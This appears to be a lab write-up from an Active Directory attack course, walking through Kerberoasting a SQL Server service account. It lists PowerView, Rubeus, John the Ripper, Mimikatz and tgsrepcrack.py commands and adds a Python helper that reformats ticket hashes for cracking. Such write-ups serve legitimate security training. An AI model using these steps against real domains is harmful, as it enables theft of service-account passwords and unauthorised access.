Obj 14 Kerberoast Pass Crack
Task - Using the Kerberoast attack, crack the password of a SQL Server service account.
We first need to find services that run under user accounts rather than machine accounts: machine account passwords are long and random, so their service tickets are not realistically crackable, while a human-set password on a user account often is. We can use PowerView's Get-DomainUser -SPN or the ActiveDirectory module to discover such accounts:
Get Domain User SPN
PS C:\AD\Tools> Get-DomainUser -SPN
Output:
samaccountname : svcadmin
serviceprincipalname : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}
This shows us that svcadmin has an SPN registered, so we can request a service ticket for it and kerberoast it.
Use Rubeus and John the Ripper to get the hash and crack it:
C:\AD\Tools>C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt
The /rc4opsec flag uses the tgtdeleg trick and only roasts accounts that do not have AES enabled, so the ticket comes back RC4-encrypted (etype 23), which is much faster to crack than AES (etype 17/18). /simple writes just the hash, one per line, to the outfile.
We can now feed hashes.txt to John the Ripper. The John build used here does not parse the port suffix in the SPN field, so edit hashes.txt first and remove the port from the SPN:
moneycorp.local:1433*
needs to be
moneycorp.local*
C:\AD\Tools>C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
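Editing the port out of every hash by hand gets tedious once more than one SPN is roasted, and it is easy to miss that a line came back as AES (etype 17/18) and will crack far more slowly than the RC4 ones. The following script is an added example, not part of the lab or of Rubeus/John: it rewrites Rubeus /simple output so the SPN field has no port, and reports which lines are AES. The sample hashes are constructed to match the $krb5tgs$ line shape Rubeus emits; the hex checksum and ciphertext are dummy filler, not real tickets.

```python
import re
import sys

# Constructed sample input in the shape Rubeus writes with /simple:
# RC4 (etype 23) lines look like  $krb5tgs$23$*user$realm$SPN*$checksum$edata
# AES (etype 17/18) lines look like $krb5tgs$18$user$realm$*SPN*$checksum$edata
# The hex after the SPN field is filler, not a real ticket.
SAMPLE_HASHES = """\
$krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
$krb5tgs$18$svcweb$dollarcorp.moneycorp.local$*HTTP/dcorp-web.dollarcorp.moneycorp.local:8443*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
"""

ETYPE_RE = re.compile(r"^\$krb5tgs\$(\d+)\$")
# ':1433' sitting right before the '*$' that closes the SPN field.
PORT_RE = re.compile(r":\d+(?=\*\$)")


def etype_of(line: str):
    """Return the Kerberos encryption type number of one $krb5tgs$ line, or None."""
    m = ETYPE_RE.match(line)
    return int(m.group(1)) if m else None


def strip_spn_port(line: str) -> str:
    """Remove the ':port' suffix from the SPN field of one $krb5tgs$ line.
    Lines whose SPN carries no port are returned unchanged."""
    return PORT_RE.sub("", line, count=1)


def normalize_hashes(text: str):
    """Split Rubeus output into lines John will accept.

    Returns (fixed, aes): 'fixed' holds every hash with the SPN port removed,
    'aes' holds the subset whose etype is 17 or 18 so the operator knows those
    will crack orders of magnitude slower than the RC4 (etype 23) ones."""
    fixed, aes = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("$krb5tgs$"):
            continue  # skip blank lines and any Rubeus banner text
        if etype_of(line) in (17, 18):
            aes.append(line)
        fixed.append(strip_spn_port(line))
    return fixed, aes


if __name__ == "__main__":
    # Usage: python fix_hashes.py hashes.txt > hashes_fixed.txt
    # With no argument the constructed sample above is processed instead.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HASHES
    fixed, aes = normalize_hashes(data)
    for line in fixed:
        print(line)
    if aes:
        print(f"# {len(aes)} AES ticket(s) present; expect slow cracking", file=sys.stderr)
```

Redirect stdout to a new file and point John at that instead of the raw Rubeus output; the AES warning goes to stderr so it does not end up in the hash file.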
- OPTION 2 -
KerberosRequestorSecurityToken .NET class from PowerShell, Mimikatz and tgsrepcrack.py
Use the KerberosRequestorSecurityToken .NET class from PowerShell to request a TGS for the service:
PS C:\AD\Tools> Add-Type -AssemblyName System.IdentityModel
PS C:\AD\Tools> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
Check that the TGS for the service is now in the ticket cache:
klist
Let's dump the tickets to disk
PS C:\AD\Tools> . C:\AD\Tools\Invoke-Mimikatz.ps1
PS C:\AD\Tools> Invoke-Mimikatz -Command '"kerberos::list /export"'
Now that we have a .kirbi file for the service ticket, crack it offline with tgsrepcrack.py:
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\2-60a10000-studentx@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.localDOLLARCORP.MONEYCORP.LOCAL.kirbi